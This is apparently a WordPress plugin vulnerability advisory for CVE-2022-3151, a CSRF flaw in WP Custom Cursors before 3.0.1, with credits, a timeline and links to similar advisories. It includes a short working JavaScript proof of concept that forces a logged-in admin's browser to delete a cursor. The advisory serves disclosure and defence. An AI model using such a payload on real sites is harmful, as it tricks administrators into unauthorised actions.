WP Custom Cursors < 3.0.1 – Arbitrary Cursor Deletion via CSRF | CVE 2022-3151 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when deleting cursors, which could allow attackers to made a logged in admin delete arbitrary cursors via a CSRF attack.

Proof of Concept

Make a logged in admin open a page with the following JS code:

fetch('https://example.com/wp-admin/admin.php?page=wp_custom_cursors', { 
method: 'POST', 
headers: new Headers({ 
'Content-Type': 'application/x-www-form-urlencoded', 
}), 
body: 'submit&delete_row=1' 
}).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

This will make them delete the cursor with ID 1

Affects Plugins

wp-custom-cursors

Fixed in 3.0.1

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

27816c70-58ad-4ffb-adcc-69eb1b210744

Timeline

Publicly Published

2022-09-21 (about 3 years ago)

Added

2022-09-21 (about 3 years ago)

Last Updated

2022-10-04 (about 3 years ago)

Other

Published

Title

Published

2021-10-05

Title

Two Way Chat < 3.1.5 - Multiple CSRF

Published

2024-11-22

Title

wp auto top <= 2.9.3 - Cross-Site Request Forgery

Published

2024-04-08

Title

Benchmark Email Lite < 4.2 - Cross-Site Request Forgery via page_settings()

Published

2025-03-24

Title

Custom Script Integration <= 2.1 - Cross-Site Request Forgery

Published

2025-12-17

Title

Simple Keyword to Link <= 1.5 - Cross-Site Request Forgery